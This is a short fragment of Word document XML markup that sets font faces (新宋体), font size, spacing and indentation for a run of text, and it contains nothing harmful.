          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91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script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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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